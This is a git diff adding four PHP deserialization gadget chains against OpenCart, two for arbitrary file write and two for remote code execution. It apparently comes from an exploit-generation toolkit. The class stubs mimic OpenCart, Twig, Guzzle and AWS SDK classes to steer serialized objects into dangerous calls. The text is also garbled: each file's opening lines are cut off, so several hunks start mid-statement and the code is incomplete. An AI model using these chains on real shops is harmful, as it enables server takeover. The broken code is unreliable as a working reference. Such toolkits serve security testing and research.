diff --git a/gadgetchains/OpenCart/FW/1/chain.php b/gadgetchains/OpenCart/FW/1/chain.php new file mode 100644 index 00000000..994ae48a --- /dev/null +++ b/gadgetchains/OpenCart/FW/1/chain.php @@ -0,0 +1,26 @@ +connection = $connection; + } + } +} + +namespace Opencart\System\Library +{ + class Session + { + protected object $adaptor; + protected string $session_id; + + public function __construct($adaptor, $session_id) + { + $this->adaptor = $adaptor; + $this->session_id = $session_id; + } + } + + class Log + { + private string $file; + + public function __construct($file) { + $this->file = $file; + } + } +} diff --git a/gadgetchains/OpenCart/FW/2/chain.php b/gadgetchains/OpenCart/FW/2/chain.php new file mode 100644 index 00000000..e076fa97 --- /dev/null +++ b/gadgetchains/OpenCart/FW/2/chain.php @@ -0,0 +1,28 @@ +connection = $connection; + } + } +} + +namespace { + class Session + { + protected object $adaptor; + protected string $session_id; + public $data; + + public function __construct($adaptor, $session_id, $data) + { + $this->adaptor = $adaptor; + $this->session_id = $session_id; + $this->data = $data; + } + } + + class Twig_Cache_Filesystem + { + // for OpenCart 3.0.3.3 or older. + } +} + +namespace Twig\Cache +{ + class FilesystemCache + { + + } +} diff --git a/gadgetchains/OpenCart/RCE/1/chain.php b/gadgetchains/OpenCart/RCE/1/chain.php new file mode 100644 index 00000000..2b4ff8cf --- /dev/null +++ b/gadgetchains/OpenCart/RCE/1/chain.php @@ -0,0 +1,25 @@ +connection = $connection; + } + } +} + +namespace Opencart\System\Library +{ + class Session + { + protected object $adaptor; + protected string $session_id; + + public function __construct($adaptor, $session_id) + { + $this->adaptor = $adaptor; + $this->session_id = $session_id; + } + } +} + +namespace Opencart\System\Engine +{ + Class Proxy + { + protected $data = []; + + public function __construct($key, $function) + { + $this->data[$key] = $function; + } + } +} diff --git a/gadgetchains/OpenCart/RCE/2/chain.php b/gadgetchains/OpenCart/RCE/2/chain.php new file mode 100644 index 00000000..65240fc5 --- /dev/null +++ b/gadgetchains/OpenCart/RCE/2/chain.php @@ -0,0 +1,25 @@ +data[$key] = $function; + // It's not essential to define a callback for 'execute' but doing + // so delays hitting errors for few more function calls. Using + // print_r here may mean you see the return value of the payload. + $this->data['execute'] = 'print_r'; + } + } +} + + +namespace GuzzleHttp\Handler { + class CurlFactory { + private $handles = []; + + public function __construct($handle) { + $this->handles = $handle; + } + } +} + +namespace Aws { + class ResultPaginator { + private $client; + private $config; + private $operation; + private $args = []; + + public function __construct($client, $operation) { + $this->config['output_token'] = false; + $this->client = $client; + $this->operation = $operation; + } + } + +}